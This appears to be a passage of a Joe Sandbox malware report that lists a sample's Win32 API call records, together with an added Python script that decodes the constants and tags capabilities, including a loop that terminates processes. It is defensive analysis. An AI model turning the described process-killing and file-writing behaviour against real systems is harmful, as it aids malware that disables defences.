• Opcode ID: f5b99e6a369382524b0f43eccf478a10086ac918bd0f362fcceb32a3a7009806
• Instruction ID: 22b809317a1e8f4ceabd0f7e90db9fa3d01592c38e56970ef6dbfb3cb24e9e0a
• Opcode Fuzzy Hash: f5b99e6a369382524b0f43eccf478a10086ac918bd0f362fcceb32a3a7009806
• Instruction Fuzzy Hash: 54E14671A01200EFD304EF24FD89A693BB5FB94710F11421AE9569BEF4EB308AD5CB95
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0014BC90
• Process32First.KERNEL32(00000000,?), ref: 0014BCE3
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0014BDDD
Memory Dump Source
• Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: CreateFirstOpenProcessProcess32SnapshotToolhelp32
• String ID:
• API String ID: 3397401024-0
• Opcode ID: 090026f7b67d7041bf3c12b2170c76f33d7a6ed27cb2576847ce17b7965815de
• Instruction ID: 7a2530460fd01909547851a5077a9f467e3d0dd6411ff288c9576712f78708c7
• Opcode Fuzzy Hash: 090026f7b67d7041bf3c12b2170c76f33d7a6ed27cb2576847ce17b7965815de
• Instruction Fuzzy Hash: B891FE75A04215DFC704DF24FCD6AAA3BB5FB98314B05815AE40693EB4EB349AD4CB40
APIs
• CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000003,00000000,00000000), ref: 001515C3
• GetFileTime.KERNEL32(00000000,?,?,?), ref: 0015168A
• CloseHandle.KERNEL32(00000000), ref: 001516A7
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00151715
• GetFileSize.KERNEL32(00000000,00000000,2AC18000,FE624E21,00989680,00000000), ref: 00151774
• CloseHandle.KERNEL32(00000000), ref: 00151792
Memory Dump Source
• Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: File$CloseHandle$CreateSizeTimeUnothrow_t@std@@@__ehfuncinfo$??2@
• String ID:
• API String ID: 3236713533-0
• Opcode ID: c790db70c0ad818271181fe7d940470d40b1c58603dba8fb8f25ca032381e17d
• Instruction ID: 7cea0b3704c3af19e84f17581c6bd26a002671af38bbf90a46284e20a9b8cb3f
• Opcode Fuzzy Hash: c790db70c0ad818271181fe7d940470d40b1c58603dba8fb8f25ca032381e17d
• Instruction Fuzzy Hash: 24712031A01304EFC701DFA9FC85A757BB4FB88710B61465AE44592EB4E77489E4CF81
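The function records above list their Win32 calls with raw hexadecimal arguments: Toolhelp32 snapshots taken with flag 2 and flag 8 and walked with Process32First/Next and Module32First, CreateFileA opened with access 80000000 (then ReadFile) and 40000000 with disposition 2 (then WriteFile), OpenProcess with access 1 followed by TerminateProcess, and CreateFileA with access 0 and disposition 3 before GetFileTime and GetFileSize. The Python script below is an added example, not Joe Sandbox code and not code from the analyzed sample: it parses those "APIs" lines as copied from this page, names the documented Win32 constants behind the arguments, and tags each function with the capability the call sequence implies. The record labels, the decision to merge the two chunks that share the OpenProcess call at 0014BDDD into one list, and the capability rules are this example's own assumptions; the constant tables are the documented Win32 values.

```python
"""Decode the Win32 constants in Joe Sandbox "APIs" listings and tag each
function with the capabilities its call sequence implies.

Added example for this report. It is not Joe Sandbox code and is not taken
from the analyzed sample; the record labels and capability rules are ours.
"""
import re
from typing import Dict, List, Optional

# Constructed sample input: the "APIs" lines of the function records on this
# page, copied from the report. Labels are the ref of each record's first
# call (our choice); the two chunks sharing OpenProcess @ 0014BDDD are merged.
RECORDS: Dict[str, List[str]] = {
    "001544A7": [
        "CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001544A7",
        "Process32First.KERNEL32(00000000,?), ref: 001545C2",
        "CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 001547CE",
        "Module32First.KERNEL32(00000000,00000224), ref: 00154842",
        "CloseHandle.KERNEL32(00000000,0000000A), ref: 0015495A",
        "Process32Next.KERNEL32(?,00000128), ref: 001549AD",
        "CloseHandle.KERNEL32(00000000), ref: 00154A20",
    ],
    "0014CB20": [
        "CreateFileA.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 0014CB20",
        "ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 0014CB5D",
        "CloseHandle.KERNEL32(00000000), ref: 0014CBBD",
        "GetTickCount.KERNEL32 ref: 0014CC1D",
        "CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0014CED4",
        "WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0014CF0E",
        "CloseHandle.KERNEL32(00000000), ref: 0014CF47",
    ],
    "0014BC90": [
        "CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0014BC90",
        "Process32First.KERNEL32(00000000,?), ref: 0014BCE3",
        "OpenProcess.KERNEL32(00000001,00000000,?), ref: 0014BDDD",
        "TerminateProcess.KERNEL32(00000000,000000FF), ref: 0014BE24",
        "CloseHandle.KERNEL32(00000000), ref: 0014BE68",
        "Process32Next.KERNEL32(00000000,00000128), ref: 0014BF01",
        "CloseHandle.KERNEL32(00000000), ref: 0014BF2F",
    ],
    "001515C3": [
        "CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000003,00000000,00000000), ref: 001515C3",
        "GetFileTime.KERNEL32(00000000,?,?,?), ref: 0015168A",
        "CloseHandle.KERNEL32(00000000), ref: 001516A7",
        "__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00151715",
        "GetFileSize.KERNEL32(00000000,00000000,2AC18000,FE624E21,00989680,00000000), ref: 00151774",
        "CloseHandle.KERNEL32(00000000), ref: 00151792",
    ],
}

# "Api.MODULE(args), ref: addr" or, for calls without an argument list,
# "Api.MODULE ref: addr". Decorated CRT names contain '$', '?' and '@'.
CALL_RE = re.compile(
    r"^(?P<api>.+?)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)

# Documented Win32 bit flags, keyed by (API, zero-based argument index).
FLAG_TABLES: Dict[tuple, Dict[int, str]] = {
    ("CreateToolhelp32Snapshot", 0): {
        0x1: "TH32CS_SNAPHEAPLIST", 0x2: "TH32CS_SNAPPROCESS", 0x4: "TH32CS_SNAPTHREAD",
        0x8: "TH32CS_SNAPMODULE", 0x10: "TH32CS_SNAPMODULE32",
    },
    ("OpenProcess", 0): {
        0x1: "PROCESS_TERMINATE", 0x2: "PROCESS_CREATE_THREAD", 0x8: "PROCESS_VM_OPERATION",
        0x10: "PROCESS_VM_READ", 0x20: "PROCESS_VM_WRITE",
        0x400: "PROCESS_QUERY_INFORMATION", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    },
    ("CreateFileA", 1): {
        0x20000000: "GENERIC_EXECUTE", 0x40000000: "GENERIC_WRITE", 0x80000000: "GENERIC_READ",
    },
}
# Documented enumerations (a single value, not a bit set).
ENUM_TABLES: Dict[tuple, Dict[int, str]] = {
    ("CreateFileA", 4): {
        1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING",
    },
}


def parse_arg(tok: str) -> Optional[int]:
    """'?' means the sandbox could not recover the value; otherwise hex."""
    tok = tok.strip()
    return None if tok == "?" else int(tok, 16)


def decode_flags(value: int, table: Dict[int, str]) -> str:
    """Render a bit set as NAME|NAME, keeping unknown bits as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    leftover = value & ~sum(table)
    if leftover:
        names.append(hex(leftover))
    return "|".join(names) if names else "0"


def decode_call(line: str) -> dict:
    """Parse one report line and name every argument we have a table for."""
    m = CALL_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised API line: {line!r}")
    args = [parse_arg(t) for t in m["args"].split(",")] if m["args"] else []
    decoded: Dict[int, str] = {}
    for i, val in enumerate(args):
        if val is None:
            continue
        key = (m["api"], i)
        if key in FLAG_TABLES:
            decoded[i] = decode_flags(val, FLAG_TABLES[key])
        elif key in ENUM_TABLES:
            decoded[i] = ENUM_TABLES[key].get(val, hex(val))
    return {"api": m["api"], "module": m["module"], "args": args, "decoded": decoded, "ref": m["ref"]}


def capabilities(calls: List[dict]) -> List[str]:
    """Our heuristic rules: a capability needs both the access/flag and the follow-up call."""
    apis = {c["api"] for c in calls}

    def decoded_values(api: str, idx: int) -> str:
        return "|".join(c["decoded"].get(idx, "") for c in calls if c["api"] == api)

    snap, access, file_access = (
        decoded_values("CreateToolhelp32Snapshot", 0),
        decoded_values("OpenProcess", 0),
        decoded_values("CreateFileA", 1),
    )
    caps = []
    if "TH32CS_SNAPPROCESS" in snap and apis & {"Process32First", "Process32Next"}:
        caps.append("process-enumeration")
    if "TH32CS_SNAPMODULE" in snap and apis & {"Module32First", "Module32Next"}:
        caps.append("module-enumeration")
    if "PROCESS_TERMINATE" in access and "TerminateProcess" in apis:
        caps.append("process-termination")
    if "GENERIC_READ" in file_access and "ReadFile" in apis:
        caps.append("file-read")
    if "GENERIC_WRITE" in file_access and "WriteFile" in apis:
        caps.append("file-write")
    if apis & {"GetFileTime", "GetFileSize"}:
        caps.append("file-metadata-query")
    return caps


def triage(lines: List[str]) -> dict:
    calls = [decode_call(line) for line in lines]
    return {"calls": calls, "capabilities": capabilities(calls)}


def triage_all(records: Dict[str, List[str]] = RECORDS) -> Dict[str, List[str]]:
    return {label: triage(lines)["capabilities"] for label, lines in records.items()}


if __name__ == "__main__":
    for label, lines in RECORDS.items():
        result = triage(lines)
        print(f"record {label}: {', '.join(result['capabilities']) or 'no tagged capability'}")
        for c in result["calls"]:
            if c["decoded"]:
                named = ", ".join(f"arg{i}={v}" for i, v in sorted(c["decoded"].items()))
                print(f"  {c['api']} @ {c['ref']}: {named}")
```

Two checks a practitioner would do by hand fall out of the decoded output. The 0014BC90 chunk opens each snapshot entry with PROCESS_TERMINATE only, the minimum right needed to call TerminateProcess, so the loop is a kill loop rather than an inspection loop. The 001515C3 chunk opens the file with desired access 0 and OPEN_EXISTING, which is the pattern for querying attributes without reading contents, consistent with the GetFileTime and GetFileSize calls that follow. The values 00000128 and 00000224 the report shows next to Process32Next and Module32First equal sizeof(PROCESSENTRY32) and sizeof(MODULEENTRY32) for a 32-bit ANSI build, which fits a 32-bit PE; treat that as a consistency check, not a decoded argument, since the sandbox displays stack values heuristically.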
APIs
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0014BDDD
• TerminateProcess.KERNEL32(00000000,000000FF), ref: 0014BE24
• CloseHandle.KERNEL32(00000000), ref: 0014BE68
• Process32Next.KERNEL32(00000000,00000128), ref: 0014BF01
• CloseHandle.KERNEL32(00000000), ref: 0014BF2F
Memory Dump Source
• Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseHandleProcess$NextOpenProcess32Terminate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3173823348-0
                                                                                                                                                                                                            • Opcode ID: 39eac9d5adceefb8c15550e11d1bcf67db098d1d40c4cd8446dce11c0c6a71ee
                                                                                                                                                                                                            • Instruction ID: ccb021a07620769e6defeb3c3bf0685f2b768490c4ec524bc0fb80500a692929
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 39eac9d5adceefb8c15550e11d1bcf67db098d1d40c4cd8446dce11c0c6a71ee
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FD51FE75A01315DFC708DF24FCD5AAA3BF5FB98329B05825AE50597AB0EB348AD0CB40
APIs
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,0015E92E,0015CA40,00000000,?), ref: 001754B2
• CreateThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 001754E4
• CloseHandle.KERNEL32(00000000,?,0015E92E,0015CA40,00000000,?), ref: 0017551D
• WaitForSingleObject.KERNEL32(?,000000FF,?,0015E92E,0015CA40,00000000,?), ref: 00175538
• CloseHandle.KERNEL32(?,?,000000FF,?,0015E92E,0015CA40,00000000,?), ref: 0017554B
Memory Dump Source
• Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: CloseCreateHandle$EventObjectSingleThreadWait
• String ID:
• API String ID: 1404307249-0
• Opcode ID: 74c2ad7216397147a5393ea55bd6ad1447b18c4dd5cf088603c679d8f1950da1
• Instruction ID: 694a498d2173d1225c7d47ecbbef0716c760df5f3367694ff5c9aa56facf8e8f
• Opcode Fuzzy Hash: 74c2ad7216397147a5393ea55bd6ad1447b18c4dd5cf088603c679d8f1950da1
• Instruction Fuzzy Hash: ED318931601305EBD3289F64FC89B227BB6FB48711F50821AE5469BEB0E77086D0CB91
APIs
• CreateProcessA.KERNEL32(?,0015ED48,00000000,00000000,00000000,00000008,00000000,00000000,00000044,?,?,?,?,?,?,00000000), ref: 0016FBF1
• CloseHandle.KERNEL32(0015ED48,?,?,?,?,?,00000000), ref: 0016FC2F
• CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 0016FC58
Strings
Memory Dump Source
• Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: CloseHandle$CreateProcess
• String ID: D
• API String ID: 2922976086-2746444292
• Opcode ID: 9542ac12595cab16621c469d33f1d8401552a73f37da0d947711aa3d00ecbda6
• Instruction ID: b5e36886409db179b7c7625acc9b4959b6bec182829420ef1e314270b64b7669
• Opcode Fuzzy Hash: 9542ac12595cab16621c469d33f1d8401552a73f37da0d947711aa3d00ecbda6
• Instruction Fuzzy Hash: BA51EA31950218DBD704DF64FC86BB63BF8FB48B11F40021AE04696EB4EBB496E4CB95
APIs
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0014D11A
• ReadFile.KERNEL32(00000000,?,00005000,?,00000000), ref: 0014D1CC
• CloseHandle.KERNEL32(00000000,?,00000000), ref: 0014D3EE
• CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 0014D2E9
  • Part of subcall function 0016FCC0: ReleaseMutex.KERNEL32(0014D410,?,0014D410,00000108), ref: 0016FCE9
Memory Dump Source
• Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: CloseFileHandle$CreateMutexReadRelease
• String ID:
• API String ID: 1760212717-0
• Opcode ID: 72af997ed25fe048fd48a17c9fea360f5ddf1f87d2654848f55dde944fd5d7c8
• Instruction ID: b53dfed79cce73865776e9820254b5fbdbd8f5860e03451f709f7cc4fa9efc8e
• Opcode Fuzzy Hash: 72af997ed25fe048fd48a17c9fea360f5ddf1f87d2654848f55dde944fd5d7c8
• Instruction Fuzzy Hash: 54B16A71A00600DBCB04AF64FC85B693BB5FBD8711F218156E54597EF1EB709AE4CB82
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001521D0
• Process32First.KERNEL32(00000000,00000128), ref: 00152257
• Process32Next.KERNEL32(00000000,00000128), ref: 00152384
• CloseHandle.KERNEL32(00000000), ref: 00152426
Memory Dump Source
• Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
• String ID:
• API String ID: 420147892-0
• Opcode ID: d09377855a9eda7c2e7454410b60b6d780d694d168c48a09e5e4403fa5e214ce
• Instruction ID: 59af42ebffe2aa8119f653f5c99daec505b1ab9a5abd3c0c54f61812807c80c2
• Opcode Fuzzy Hash: d09377855a9eda7c2e7454410b60b6d780d694d168c48a09e5e4403fa5e214ce
• Instruction Fuzzy Hash: 95913372A00314CFC305DF25FC89AA53BB4FBA9310F15820AD84296EB4EB7486E9CF51
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,001503A9,00000000,?), ref: 00156957
                                                                                                                                                                                                            • RtlReAllocateHeap.NTDLL(00000000,?,001503A9,00000000), ref: 0015695E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,001503A9,00000000,?), ref: 001569C8
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,001503A9,00000000,?), ref: 001569CF
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$AllocAllocate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1154092256-0
                                                                                                                                                                                                            • Opcode ID: 0854f8f39c79355000b5cca1c97547dff543017d721ebea2f690d2947a5c11b6
                                                                                                                                                                                                            • Instruction ID: 5fe13a9a5083639da10640ce7b551ac2f636f8185c7407b44799b024cbd98ca6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0854f8f39c79355000b5cca1c97547dff543017d721ebea2f690d2947a5c11b6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED21AEB2605204DFD7049F61FE8A9503F78F785310B624619E98693DB4E73199E1CF90
Strings
Memory Dump Source
• Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID:
• String ID: XH$/
• API String ID: 0-571299465
• Opcode ID: b4656a4c5f8482031727f7f7eaad5f1f04ca7793e41cb5cc8ead07e1821537b5
• Instruction ID: ef8cb2bfebd598330e323af41355f5a4dbc948586ff720e8fd952b287562e22a
• Opcode Fuzzy Hash: b4656a4c5f8482031727f7f7eaad5f1f04ca7793e41cb5cc8ead07e1821537b5
• Instruction Fuzzy Hash: 11F11371A00215DFD714EF60FC92ABA3BB9FB64300F54826AE40A579B1EB708AD4CF50
APIs
• GetSystemTime.KERNEL32(0016247D,00000001,?,?,0016247D), ref: 0017518C
• GetTickCount.KERNEL32 ref: 001752BE
Strings
Memory Dump Source
• Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: CountSystemTickTime
• String ID: @AB
• API String ID: 2164215191-841575833
• Opcode ID: 078d7c74786d9cd1011380062dce38b52bf8972c8095f24bab9c3b901f651bbe
• Instruction ID: 82845a754f6ede21e7eb08de9a3fb57ff9c2689891cd13d6accb8e7c52fc6a73
• Opcode Fuzzy Hash: 078d7c74786d9cd1011380062dce38b52bf8972c8095f24bab9c3b901f651bbe
• Instruction Fuzzy Hash: 0451DE72A00A11CFC308DF69FD899253BB6F7987003464116E48AC7EB4EB748AE4CB85
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2531980973.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 0000000B.00000002.2531909149.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532039542.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001B3000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001B6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532323438.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID:
• String ID: XH$/$U][v
• API String ID: 0-1996962770
• Opcode ID: a457eeb441ef02acbbd4f9f617d531920dcb212b0b411580e480863b52f9d365
• Instruction ID: 90313c74ff47ac2c4b629f26429c197e08e3fbfd281e0d3b7a6a192a629c6b15
• Opcode Fuzzy Hash: a457eeb441ef02acbbd4f9f617d531920dcb212b0b411580e480863b52f9d365
• Instruction Fuzzy Hash: C4B25671A00204DFD709EF64FC95AB93BB5FBA4300B55425AE44697EB4EB308AE5CF81

Control-flow Graph

• Executed
• Not Executed
